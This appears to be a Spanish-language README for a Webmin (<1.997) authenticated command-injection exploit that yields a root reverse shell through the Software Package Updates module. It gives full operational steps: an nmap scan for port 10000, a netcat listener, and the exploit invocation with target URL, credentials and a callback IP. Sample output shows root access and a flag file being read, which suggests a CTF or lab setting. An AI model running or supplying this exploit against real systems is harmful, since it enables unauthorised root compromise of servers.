
Exploit de ejecución remota de código autenticado para Webmin < 1.997 a través del módulo de Actualizaciones de Paquetes de Software. Inyecta comandos arbitrarios como root a través de un parámetro no saneado, entregando una reverse shell.
Exploit para la vulnerabilidad de Remote Code Execution en Webmin versiones anteriores a 1.997, a través del módulo Software Package Updates.
El módulo Software Package Updates de Webmin no sanitiza correctamente el
parámetro u antes de pasarlo al sistema. Un usuario autenticado con acceso
a ese módulo puede inyectar comandos arbitrarios que se ejecutan como root.
Instala las dependencias antes de ejecutar el exploit:
pip3 install requests beautifulsoup4 lxml urllib3
| Parámetro | Descripción | Ejemplo |
|---|
-t | URL del target (sin puerto) | https://192.168.1.10 |
-u | Usuario de Webmin | admin |
-p | Contraseña de Webmin | password123 |
-l | Tu IP (donde recibes la shell) | 192.168.1.5 |
-lp | Puerto donde escuchas | 4444 |
1 — Identifica la IP del target con Nmap:
nmap -sV TARGET_IP
# Busca el puerto 10000 con Webmin
2 — Abre el listener en tu máquina:
nc -lvnp 4444
3 — En otra terminal, ejecuta el exploit:
python3 exploit.py \
-t https://TARGET_IP \
-u admin \
-p PASSWORD \
-l TU_IP \
-lp 4444
4 — Si el exploit es exitoso verás:
5 — En el listener recibirás una shell como root:
# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}
# Terminal 1
nc -lvnp 4444
# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444